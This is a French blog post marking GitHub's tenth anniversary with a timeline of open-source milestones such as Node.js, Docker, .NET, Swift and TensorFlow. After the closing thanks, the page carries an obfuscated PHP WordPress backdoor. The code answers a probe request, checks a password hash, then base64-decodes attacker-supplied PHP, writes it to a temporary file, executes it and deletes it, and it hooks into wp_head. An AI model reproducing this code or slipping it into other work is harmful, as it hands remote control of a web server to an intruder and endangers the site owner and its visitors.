GitHub fête dix ans au service des développeurs

GitHub fête dix ans au service des développeurs Posted on avril 11, 2018

GitHub, leader mondial des plateformes collaboratives destinées aux développeurs, célèbre cette année son dixième anniversaire.

Une occasion de revenir sur le chemin parcouru : en dix ans, les développeurs ont travaillé ensemble sur de nombreux projets sur la plateforme, contribuant à l’avancée de ce qui allait devenir le plus grand réseau social spécialisé.

« Nous avons évolué en tant qu’entreprise et en tant que plateforme, et ce, grâce à notre communauté. », précise Chris Wanstrath, cofondateur & CEO de GitHub.

Ce que célèbre GitHub, c’est moins une dixième année d’existence qu’une aventure collective au cours de laquelle des projets ont pu être construits en open source, permettant aux développeurs d’apprendre les uns des autres. GitHub a d’ailleurs dressé une liste non exhaustive des temps forts et des moments qui ont marqué cette décennie.

Pour la décennie à venir, la plateforme compte poursuivre son évolution en tant que communauté.

« Nous avons vu des projets prendre forme et grandir, des développeurs partager leurs codes et leurs projets, et nous nous réjouissons des ressources que les entreprises ont investi pour que cela soit possible. Nous avons hâte de voir ce que cela donnera dans les années à venir », se félicite Chris Wanstrath.

Merci pour ces dix années

Depuis 10 ans, vous partagez, enseignez, bricolez et créez avec GitHub aux quatre coins du monde. Au moment d’entamer une nouvelle décennie, nous avons dressé une liste non exhaustive de nos moments préférés qui nous rappellent comment vous avez fait progresser le monde du logiciel.

10 avril 2008 : GitHub voit officiellement le jour

C’est en avril 2008 que notre version bêta privée a pris fin, marquant la naissance officielle de GitHub avec pour simple objectif de connecter les développeurs et de faciliter leur collaboration avec Git.

3 avril 2008 : Rails rejoint Git et GitHub

Ruby on Rails est l’un des premiers projets open source de grande envergure à avoir rejoint GitHub alors que la plateforme était encore en phase bêta privée. Sachant que GitHub est construit sur le projet Rails, ce fut un grand moment.

3 janvier 2009 : invention du Bitcoin 

Bitcoin, la première monnaie numérique décentralisée au monde, est arrivée sur GitHub en 2009. À ce jour, le projet Bitcoin a enregistré plus de 18 000 fourches et plus de 500 auteurs de demandes d’extraction fusionnées, inspirant des milliers d’autres projets de chaînes de blocs sur GitHub, dont bon nombre sont dérivées du code source de Bitcoin.

21 mai 2009 : lancement de Node.js 

Lancé en 2009, Node.js a entraîné une modification radicale de la façon dont est utilisé JavaScript. Avec Node.js, les développeurs peuvent créer des applications complexes côté serveur et côté desktop pour différents systèmes d’exploitation en utilisant des bibliothèques et des frameworks comme Angular, Ember, React, jQuery et Vue. Le projet a étendu de façon significative les possibilités de JavaScript et contribué à l’essor d’un langage de programmation majeur.
En 2014 est née io.js, une plateforme basée sur Node.js et créée dans le but de renforcer les principes d’ouverture de la communauté. Un an plus tard, les deux projets ont défini un modèle de gouvernance ouverte et se sont réunis au sein de la nouvelle Fondation Node.js, démontrant la puissance des communautés open source pour résoudre des problèmes complexes de collaboration dans le cadre de deux projets majeurs.
Aujourd’hui, Node.js gère l’un des plus riches écosystèmes de bibliothèques et d’outils avec près de 2 000 contributeurs à Node.js Core. Son apprentissage est relativement aisé grâce à NodeSchool, un projet qui relie les développeurs, propose des tutoriels gratuits et organise des événements dans le monde entier.

26 novembre 2010 : Rails Girls organise son premier atelier Summer of Code

Le groupe de codeuses Rails Girls a organisé son premier événement à Helsinki en 2010. En 2013, le groupe a lancé Summer of Code, un projet international qui finance les femmes et les personnes non binaires pendant trois mois au cours desquels elles travaillent à plein temps sur des projets open source. Parallèlement au Summer of Code organisé avec Google et au projet Outreachy dédié aux groupes sous-représentés dans les communautés du logiciel libre, l’initiative Rails Girls Summer of Code a eu un impact durable sur la représentation dans l’industrie du logiciel. Les Rails Girls viennent de célébrer leur cinquième anniversaire et le moment est idéal pour soutenir leur travail.

28 février 2011 : Première demande d’extraction de Travis CI 

Le lancement de Travis CI en 2011 a apporté une solution d’intégration continue (CI — Continuous Integration) fiable et cohérente aux projets privés et open source. Travis CI fut également l’un des premiers développeurs d’outils à s’intégrer à GitHub. Jenkins et CircleCI ont été fondés à peu près à la même époque, ce qui fait de 2011 une année décisive pour l’intégration continue (CI) et l’industrie du logiciel au sens large. Les tests se sont imposés comme un élément essentiel pour l’écriture de codes plus sûrs et plus fiables. Pour en savoir plus, consultez le top 10 des outils CI utilisés sur GitHub.

1er janvier 2012 : JavaScript devient le langage le plus populaire sur GitHub

JavaScript a entamé l’année 2012 en se positionnant comme le langage le plus populaire sur GitHub, devant Ruby, Java et Python. C’est encore aujourd’hui le langage la plus prisé sur GitHub.

16 janvier 2013 : la communauté GitHub franchit le cap des trois millions d’utilisateurs

Et dans le courant de l’année, notre communauté a créé son 10 millionième dépôt, dont le référentiel contenant le projet Open Data.

9 juin 2014 : lancement de Docker 1.0 

Docker 1.0 voit le jour en juin 2014, soit un peu plus d’un an après sa version initiale, mettant le programme conteneur de Docker à la disposition des datacenters d’entreprise et du cloud. Des projets comme Docker et Kubernetes ont marqué le lancement du mouvement des conteneurs, simplifiant l’approche DevOps et libérant les équipes de leur infrastructure pour qu’elles puissent se concentrer pleinement sur ce qui compte le plus.

21 juillet 2014 : premier atelier Django Girls 

Le premier atelier Django Girls a eu lieu lors de l’événement EuroPython 2014 organisé à Berlin, marquant le coup d’envoi de quatre années de formation et de soutien aux femmes du monde entier. Soutenez leur travail pour que la communauté des Django Girls continue de se développer.

23 octobre 2014 : Microsoft met son framework .NET en open source

Le freamework .NET et la fondation .NET furent les premières initiatives de Microsoft en faveur des logiciels open source. Aujourd’hui, l’entreprise gère plusieurs centaines de projets open source, parmi lesquels VS Code, qui a totalisé l’année dernière le plus grand nombre de contributeurs, tous projets confondus, et TypeScript, l’un des langages qui connaîtra la croissance la plus rapide en 2017.

Microsoft est également devenu l’un des plus actifs contributeurs sur GitHub avec des milliers d’ingénieurs, concepteurs et responsables de programmes qui éditent des logiciels sur plusieurs plateformes en utilisant différents langages de programmation.
Les investissements consacrés aux logiciels libres par des grands comptes comme Microsoft ou Google ont fait évoluer la façon dont les entreprises créent leurs logiciels. Ils nous ont aussi montré que leur « sauce secrète » n’est pas toujours la technologie créée, mais la façon dont les utilisateurs — et les communautés — s’en servent.

2 mars 2015 : le code source Unreal Engine 4 est disponible gratuitement 

L’équipe d’Epic Games a annoncé la disponibilité gratuite d’Unreal Engine 4, faisant tomber les barrières entre les développeurs de jeux et leur vision créative en utilisant les meilleurs outils. Le code source gratuit permet également à leur communauté d’accéder à des fonctionnalités majeures avant leur sortie. De la correction de bogues à l’intégration à Git, la dernière version a bénéficié de 128 contributions de la communauté.
Les jeux ont constitué l’un des sujets les plus populaires sur GitHub en 2017 grâce aux moteurs, bibliothèques et autres outils de développement de jeux open source. Phaser, Godot, ainsi que d’autres projets comme Itch.io, façonnent la manière dont les jeux indépendants sont créés et partagés. De plus, des ressources d’apprentissage open source et des jeux comme 2048, inspiration de centaines de clones, ont amené un nombre croissant de personnes à jouer et créer.

Outre le développement actif de jeux, le code source public de certains des jeux les plus populaires de tous les temps, parmi lesquels Doom et Prince of Persia sont archivés dans des dépôts publics, ce qui est certainement un sort plus enviable qu’être enfoui dans le désert du Nouveau-Mexique !

22 septembre 2015 : c’est la rentrée des classes pour GitHub !

GitHub Classroom permet aux enseignants de distribuer plus facilement le code de départ et de collecter les devoirs (assignments) sur GitHub. Aujourd’hui, les élèves des lycées, universités et camps de codage (coding bootcamps) apprennent dans 1,8 million de référentiels Classrooms. Toutefois, ces ressources éducatives ne sont pas les seules accessibles sur GitHub.

Qu’il s’agisse de listes de ressources ou de cours en ligne massivement ouverts (MOOC) comme edX et Udacity, vous avez créé des milliers de façons d’apprendre le développement logiciel sur GitHub. Parmi les cours les plus appréciés figurent le programme de démarrage (Jumpstart) d’Ada et les tutoriels TensorFlow de l’université de Stanford. STAT545 enseigne à des milliers d’étudiants comment manipuler les données, tandis que CS50 est actuellement adopté dans les salles de classe aux États-Unis.

Au cours de la décennie écoulée, des programmes communautaires comme Django Girls ont lancé des tutoriels en ligne, organisé des événements « en personne » et élargi les possibilités d’apprentissage d’élèves du monde entier. Nos experts établissent également des communautés technologiques sur les campus dans plus de 15 pays.

3 décembre 2015 : Apple annonce la disponibilité de Swift en open source

La décision de rendre Swift disponible en tant que langage open source a élevé la barre pour les nouveaux outils de développement et encouragé un nombre croissant d’entreprises à ouvrir leurs outils au public.

9 juillet 2016 : le code Apollo 11 décolle !

Apollo 11 s’est posé sur la Lune en 1969. Quarante-sept ans plus tard, le code source utilisé pour son lancement a atterri sur GitHub où il fait le bonheur des spécialistes, notamment en raison du nombre de surprises qu’il renfermait, ce qui prouve que les programmeurs des années 60 ne manquaient pas d’humour.

Outre le stockage de codes historiques, les entreprises envoient des engins spatiaux modernes et repoussent les frontières de la recherche scientifique au moyen de logiciels libres et fermés. La NASA gère des centaines de projets open source. Dans certains dépôts publics, vous trouverez des logiciels capables de visualiser le sol martien et d’identifier des exoplanètes au moyen de TensorFlow. Vous pouvez également trouver des projets open source que des entreprises comme SpaceX utilisent pour créer leurs logiciels, y compris le projet qui a rendu ce moment possible.

10 février 2017 : L’équipe Python ouvre sa première demande d’extraction sur GitHub 

Les responsables de Python ont annoncé leur intention de migrer vers GitHub début 2016 et ouvert leur première demande d’extraction dès l’année suivante. Au cours de la dernière décennie, Python est devenu l’un des langages de programmation les plus dynamiques. Avec une progression annuelle de près de 70 % dans les dépôts sans spam créés, c’est le troisième langage le plus populaire sur GitHub depuis 2015.

L’histoire de Python remonte au début des années 1990, mais ce langage a gagné en importance depuis quelques années et ce, probablement en raison du vaste écosystème d’outils d’apprentissage automatique et de science des données créés par sa communauté, à commencer par Scikit-learn en 2007. Des bibliothèques extrêmement populaires telles que pandas facilitent également la manipulation des données dans Python.

15 février 2017 : lancement de TensorFlow 1.0 

Google a initialement publié sa bibliothèque d’apprentissage automatique TensorFlow en 2015. L’année dernière, ce projet fut l’un des plus dérivés (forked) sur GitHub, et le référentiel de modèles/TensorFlow comptait 5,5 fois plus de visites en 2017 qu’en 2016. Aujourd’hui, TensorFlow est un outil indispensable pour les professionnels des données qui créent des modèles d’apprentissage automatique.

Ces dernières années, les possibilités de l’apprentissage automatique ont franchi de nouvelles limites. Les entreprises et les individus utilisent TensorFlow pour créer des modèles capables de diagnostiquer les troubles psychiatriques, de classer les cancers de la peau, de composer de la musique et de motoriser les Mario Karts.

Aujourd’hui, les data scientists peuvent utiliser de nombreux outils et modèles d’apprentissage profond (deep learning) open source pour résoudre des problèmes aussi complexes qu’intéressants. Outre TensorFlow, des outils comme Caffe2, Sonnet, DeepSpeech, et Keras— sans oublier des outils d’analyse de données tels que pandas et Jupyter — sont utilisés dans de nombreuses applications de data science et de multiples secteurs industriels.

2 mai 2017 : 30 000 comptes sans but lucratif ont été créés

Les organisations sans but lucratif et les ONG accomplissent des choses formidables avec la technologie. L’an dernier, nous avons franchi la barre des 30 000 utilisateurs « sans but lucratif » qui rendent le monde meilleur grâce à des initiatives comme Human Utility, Maven et ConnectHome.

Les initiatives de protection de l’environnement marin déployées par la Wildlife Conservation Society (WCS) couvrent 25 pays avec pour objectif de protéger et préserver les récifs coralliens du monde. Au Kenya, WCS utilise des logiciels pour traiter des données fournies par des chercheurs du monde entier et aider les communautés locales à pêcher de manière plus rentable et durable en recueillant des données sur les espèces et en surveillant plus de 252 hectares de récifs côtiers, soit environ 260 terrains de football.

31 mai 2017 : merge de la 100 millionième demande d’extraction…

…ce qui représente énormément de bogues corrigés, de fonctionnalités lancées et de logiciels améliorés ! En fait, vous avez commis environ 2,9 trillions de lignes de code au cours de la seule année 2017 (1 trillion = 1 000 milliards).

10 avril 2018 : dix ans de code, de collaboration et de commits
Une décennie après le lancement officiel de GitHub, notre communauté compte 27 millions de développeurs travaillant dans le monde entier sur plus de 80 millions de projets.
Merci à tous pour les dépôts que vous avez créés, pour vos contributions et les logiciels que vous avez réalisés ensemble. Merci pour ces 10 années au service du code.
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}